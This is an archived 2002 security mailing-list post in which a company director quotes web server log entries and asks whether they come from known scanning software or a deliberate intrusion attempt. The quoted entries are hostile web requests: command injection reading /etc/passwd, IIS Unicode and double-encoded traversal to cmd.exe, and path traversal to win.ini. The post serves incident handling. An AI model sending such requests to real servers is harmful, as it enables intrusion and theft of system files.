Hosting Provided By

A small quandary

From: Mahoney, Paul <paul(at)fiberstarr.com>
Date: Wed Dec 04 2002 - 23:30:08 EST

Hi all,

I have in my possession a log file that implicates a business acquaintance, who to say the least, might have the attitude to mount an offensive.

The log file contains many entries like:-

404

/cgi-bin/publisher/search.cgi?dir=jobs&template=;cat+/etc/passwd|&output
_number=10
/perl/ 1 -
/cgi-bin/test-cgi.bat?|ver 1 -
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir+c: 1 -
/cgi-bin/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini 1 -
/scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\\

My question to everyone out there is would anyone be able to tell me if this kind of attack has the fingerprints of any known software/viruses in the field or is it a deliberate attempt to gain access to my clients site?

Your thoughts are welcomed

Paul Mahoney
Director
FiberStarr Systems
www.fiberstarr.com

This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com Received on Thu Dec 5 22:28:25 2002

Do you need help?

This message: [ Message body ]
Next message: Curt Wilson: "Black Ice small segment size FTP attack caused by FX-scanner"
Previous message: Russell Fulton: "Re: Incident tracking database"
In reply to Nick FitzGerald: "Re: Unicode Attack"
Next in thread: Jerry Shenk: "RE: A small quandary"
Reply: Jerry Shenk: "RE: A small quandary"
Reply: Rob Shein: "RE: A small quandary"
Reply: H C: "Re: A small quandary"
Reply: Mike Katz: "Re: A small quandary"
Reply: gminick: "Re: A small quandary"
Reply: Julian Young: "Odd entries in my Security Router logs"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:01:52 EDT